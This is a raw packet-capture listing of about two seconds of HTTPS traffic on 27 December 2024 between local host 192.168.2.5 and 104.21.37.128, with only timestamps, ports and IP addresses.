Dec 27, 2024 20:25:16.997945070 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.997960091 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.998028040 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:16.998034000 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:16.998081923 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.001665115 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.001679897 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.001750946 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.001756907 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.001807928 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.004693985 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.004709005 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.004781961 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.004787922 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.004839897 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.034161091 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.034178019 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.034256935 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.034265995 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.034317970 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.037180901 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.037194967 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.037245035 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.037250996 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.037292957 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.037314892 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.041043043 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.041085005 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.041121960 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.041126966 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.041166067 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.041187048 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.044101000 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.044140100 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.044214010 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.044219971 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.044264078 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.196744919 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.196830034 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.196842909 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.196851969 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.196916103 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.199413061 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.199457884 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.199502945 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.199508905 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.199542046 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.199564934 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.203162909 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.203205109 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.203244925 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.203252077 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.203316927 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.206229925 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.206274033 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.206320047 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.206325054 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.206357002 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.206382036 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.235774040 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.235819101 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.236008883 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.236008883 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.236022949 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.236083984 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.238754034 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.238797903 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.238841057 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.238845110 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.238900900 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.242516994 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.242556095 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.242599010 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.242604017 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.242630959 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.242664099 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.245563984 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.245620966 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.245649099 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.245654106 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.245704889 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.398061037 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.398123026 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.398272038 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.398272038 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.398281097 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.398332119 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.400836945 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.400880098 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.400918961 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.400926113 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.400978088 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.403855085 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.403893948 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.403934956 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.403939962 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.403975964 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.403999090 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.407627106 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.407669067 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.407711983 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.407716990 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.407764912 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.438396931 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.438443899 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.438483000 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.438491106 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.438540936 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.441595078 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.441653013 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.441680908 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.441687107 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.441718102 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.441756010 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.444750071 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.444796085 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.444833994 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.444839001 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.444885015 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.447643042 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.447716951 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.447726011 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.447741985 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.447778940 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.447803020 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.599436998 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.599482059 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.599524021 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.599531889 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.599589109 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.599613905 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.602077007 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.602121115 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.602159977 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.602164984 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.602232933 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.605150938 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.605235100 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.605240107 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.605267048 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.605302095 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.605325937 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.608886003 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.608930111 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.608973026 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.608982086 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.609020948 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.609041929 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.638739109 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.638783932 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.638889074 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.638899088 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.638963938 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.642625093 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.642664909 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.642707109 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.642713070 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.642743111 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.642774105 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.646015882 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.646055937 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.646135092 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.646148920 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.646224022 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.649288893 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.649332047 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.649375916 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.649380922 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.649435997 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.800856113 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.800909996 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.800981998 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.800991058 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.801058054 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.803380966 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.803422928 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.803467035 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.803472042 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.803504944 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.803527117 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.807163954 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.807204008 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.807243109 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.807248116 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.807301044 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.810102940 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.810143948 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.810177088 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.810183048 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.810209990 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.810237885 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.839628935 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.839685917 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.839777946 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.839795113 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.839996099 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.841094017 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.842449903 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.842492104 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.842540979 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.842546940 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.842607021 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.846159935 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.846201897 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.846249104 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.846255064 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.846280098 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.848754883 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.849128008 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.849198103 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.849222898 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.849227905 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.849270105 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.853015900 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.853066921 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.853116989 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.853121996 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:17.853193998 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.854104042 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:17.854146957 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.003935099 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.003981113 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.004023075 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.004029989 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.004060984 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.004084110 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.006890059 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.006932020 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.006977081 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.006987095 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.007040024 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.010689020 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.010732889 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.010773897 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.010780096 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.010824919 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.010845900 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.041043043 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.041090965 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.041130066 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.041136026 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.041188002 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.044120073 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.044162989 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.044198990 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.044203997 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.044250011 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.044260979 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.047928095 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.047971964 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.048011065 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.048015118 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.048063993 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.050559998 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.051470041 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.051510096 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.051546097 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.051551104 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.051588058 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.051609993 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.055490017 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.055532932 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.055563927 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.055567980 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.055615902 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.207112074 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.207165003 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.207194090 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.207204103 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.207261086 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.210067034 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.210110903 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.210131884 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.210136890 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.210180998 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.213819981 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.213860989 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.213896990 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.213906050 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.213942051 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.213974953 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.242518902 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.242594004 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.242610931 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.242619038 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.242686033 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.245659113 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.245699883 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.245728970 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.245733976 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.245788097 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.249083996 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.249099016 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.249170065 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.249177933 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.249237061 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.252203941 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.252219915 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.252274990 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.252280951 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.252336979 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.255907059 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.255922079 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.256005049 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.256011009 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.256062031 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.293062925 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.649238110 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.649260044 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.649432898 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.649451017 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.649502039 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.649617910 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.649632931 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.649672985 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.649679899 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.649707079 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.649724960 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.649815083 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.649831057 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.649878025 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.649884939 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.649924994 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.650923014 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.650937080 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.650999069 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.651005030 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.651043892 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.651865959 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.651882887 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.651931047 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.651937008 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.651957989 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.651983023 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.652800083 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.652812958 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.652853012 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.652858019 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:18.652887106 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:18.652904987 CET	49810	443	192.168.2.5	104.21.37.128
